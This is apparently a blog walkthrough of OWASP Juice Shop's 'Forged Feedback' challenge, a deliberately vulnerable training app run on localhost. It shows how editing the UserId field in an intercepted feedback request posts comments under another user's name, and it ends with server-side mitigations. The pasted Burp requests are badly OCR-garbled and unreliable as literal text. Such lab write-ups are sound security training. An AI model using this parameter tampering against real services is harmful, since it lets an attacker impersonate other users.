Hacking OWASP’s Juice Shop Pt. 28: Forged Feedback

Challenge: 

Name: Forged Feedback

Description: Post some feedback in another user’s name.

Difficulty: 3 star

Category: Broken Access Control

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-access-control.html

Tools used:

Burp, FoxyProxy

Resources used:

None.

Methodology: 

Because once more the expanded description points to intercepting the communication with the RESTful backend, I opened Burp and set up FoxyProxy, then navigated to the Customer Feedback form from Amy’s user account. After filling it in it was time to intercept a packet and figure out how to exploit it.

HIT P history WebSockets history 
Request to http://localhost:3000 
[127 001] 
Options 
Param s Headers 
Raw Actions V 
I /api/Feedbacks/ 
Host: local host 3000 
OUser-Agent: MoziIIa/S.O (X 
11; Linux x86 64; 
application/ j son, text/ plain, 
4 Accept 
S Accept -Language: en-lJS, 
Accept -Encoding: gzip, deflate 
7 Content -Type: application/ j son 
Content -Length: 216 
Origin: http://localhost : 3000 
10 Connection: close 
Referer: http://localhost : 3000/ 
rv.78.o) 
Gecko,'20100101 Firefox,'78.o 
Comment this item 
cont in u eco f Q2sqDUoeuDV18NUQmHÜAfYQU7yS8sf9VfZyFP4f3mToN; 
12 OCook1e: language=en; 
141{ 
'lJserId" : Il 
'captchald" : O, 
'captcha 
'210" , 
'comment " "Bender: 
rating" : I 
welcomebanner status=dismiss, 
cookieconsent 
Shut 
up, 
baby, 
you love it. 
\nAmy 
Don't tell 
status=dismiss, 
me to shut 
You know what 
happened to the last 
guy that told me to shut 
up ? 
uice-sh.op)

Since it’s been proven time and again that Juice Shop’s servers basically never validate anything they receive, I knew I’d just have to update the “UserId” field. Now I had to decide who I was going to pin this on.

"createdAt": " 
"deletedAt" : 
nun, 
"deluxeToken" . 
"email": "benderö)juice-sh .op" , 
"id": 
"isActive" : 
true, 
"lastLoginIp" : 
"0.0.0.0" , 
"password • " 
"assets/ public/images/uploads/default.svg" 
"profilelmage" : 
"role": "customer" 
"totpSecret": " " , 
"updatedAt": " 
"username" :

Target selected, it was just a matter of updating the “UserId” field in the JSON object to make Bender look slightly more guilty than normal. Not a particularly tall order.

Dashboard Target 
Intruder Repeater 
Sequencer 
Decoder 
Comparer 
Extender 
Project options 
User options 
"SON web Tokens 
Logger++ 
HIT P history WebSockets history Options 
Request to http://localhost:3000 
[127 001] 
w Para ms Headers 
Raw 
Pretty 
IActions 
POST /api/Feedbacks/ 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; 
application/ j son, text/ plain, 
Accept 
Accept -Language: en-LlS, en; q=O.S 
Accept -Encoding: gzip, deflate 
Content -Type: application/ j son 
Content -Length: 216 
Origin: http://localhost : 3000 
Connection: close 
Referer: http• 
// I Ocal host 3000/ 
rv.78.o) 
Gecko,'20100101 Firefox,'78.o 
Comment this item 
cont inuecode= JsqU6HouQh1TkFKi f Q2sqDUoeuDV1aNUQmHÜAfYQU7yS8sf9VfZyFP4f3mToN; 
Cookie: language=en; 
" Userld" : 3, 
'captchald" : O, 
'captcha 
'210" , 
'Bender: 
comment 
rating" : I 
welcomebanner status=dismiss, 
cookieconsent 
Shut 
up, 
baby, 
you love it. 
\nAmy 
Don't tell 
status=dismiss, 
me to shut 
You know what 
happened to the last 
guy that told me to shut 
up? 
(bender@j uice-sh.op)

Now just send it in and….

You successfully solved a challenge: Forged Feedback (Post some feedback in another users name.) X
Comment 
user: #3 
Bender: Shut up, baby, you love it. Amy: 
Don't tell me to shut up! You know what 
happened to the last guy that told me to 
shut up? (bender@juice-sh.op) 
X Close
“Shut up.”

The form also limits inputs to 140 characters. That limit is not enforced on the server side, meaning that with a sufficiently large text file you may be able to mangle the database.

Prevention and Mitigation Strategies:

OWASP Mitigation Cheat Sheet

Matching the user’s cookie data to the JSON fields would go a long way to solving this type of thing. If User A’s cookie is submitting things tagged as User B, then simply reject them as unauthorized.

Second, actually enforce the text size limits on the server side. You don’t want someone uploading War and Peace into a field designed to hold a tweet.

Lessons Learned and Things Worth Mentioning: 

All of those years of watching Futurama are really paying off for me. And my parents said I’d never get anywhere by watching cartoons…

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s